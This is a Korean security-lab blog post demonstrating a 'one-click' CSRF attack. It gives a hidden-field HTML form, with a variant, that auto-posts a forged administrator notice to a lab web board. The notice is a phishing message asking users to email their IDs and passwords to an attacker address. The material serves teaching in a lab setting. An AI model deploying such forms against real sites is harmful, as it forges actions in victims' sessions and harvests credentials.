Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
Tags
- XSS
- Linux
- arp
- wireshark
- IDS
- WAF
- csrf
- Websec
- Router Firewall
- VPC
- Database Scheme
- RDS
- UTM
- snmp
- SQL
- NETSEC
- Vlan
- Web
- DHCP
- VPN
- GRE
- stored procedure
- HSRP
- 보안 솔루션
- Web Authentication
- Mass SQL Injection
- Blind SQL Injection
- AWS
- docker
- sql injection
Archives
- Today
- Total
yuil :: SecOps
[WebSec] CSRF 공격 Lab 04 본문
one-click attack
1. CSRF 공격 방법 중 One-click Attack은 게시글 자동 생성 후 게시글 리스트로 돌아가는 현상을 해결하기 위해, 그리고 script가 제한되어 있는 경우 사용할 수 있는 방법이다.
2. One-click Attack을 이용해 게시글 자동 작성 공격을 하라.
<hint> 로그인 폼을 만들어 주는 소스코드에 있습니다.
<form id="board" method="post" action="http://192.168.65.20/board/board_write_ok.asp" enctype="multipart/form-data">
<input type="hidden" name="name" value="관리자">
<input type="hidden" name="password" value="1234">
<input type="hidden" name="email" value="admin@webhack.com">
<input type="hidden" name="subject" value="공지사항">
<input type="hidden" name="tag" value="T">
<input type="hidden" name="content" value="서비스의 기술적인 문제로 인해 고객님들의 비밀번호가 노출 되었습니다. 아래 메일로 고객님의 ID와 변경할 비밀번호를 즉시 보내주시길 바랍니다. 감사합니다. attacker@webhack.com">
<input type="submit" name="submit" value="추천">
<input type="submit" name="submit" value="비추천">
</form>
kali

xp



추가 활용
<button type="submit" value="submit">비추</button>
<input type="image" src"/board/upload/hyosung.jpg" alt="test">
<form id="board" method="post" action="http://192.168.65.20/board/board_write_ok.asp" enctype="multipart/form-data">
<input type="hidden" name="name" value="관리자">
<input type="hidden" name="password" value="1234">
<input type="hidden" name="email" value="admin@webhack.com">
<input type="hidden" name="subject" value="공지사항">
<input type="hidden" name="tag" value="T">
<input type="hidden" name="content" value="서비스의 기술적인 문제로 인해 고객님들의 비밀번호가 노출 되었습니다. 아래 메일로 고객님의 ID와 변경할 비밀번호를 즉시 보내주시길 바랍니다. 감사합니다. attacker@webhack.com">
<input type="submit" name="submit" value="추천">
<input type="submit" name="submit" value="비추천">
<button type="submit" value="submit">비추</button>
<input type="image" src"/board/upload/hyosung.jpg" alt="test">
</form>



반응형
'실습 > Web Security 실습' 카테고리의 다른 글
| [WebSec] CSRF 공격 방어 실습 (0) | 2025.10.17 |
|---|---|
| [WebSec] CSRF 공격 Lab 05 (0) | 2025.10.17 |
| [WebSec] CSRF 공격 Lab 03 (0) | 2025.10.17 |
| [WebSec] CSRF 공격 Lab 02 (0) | 2025.10.16 |
| [WebSec] CSRF 공격 Lab 01 (0) | 2025.10.16 |
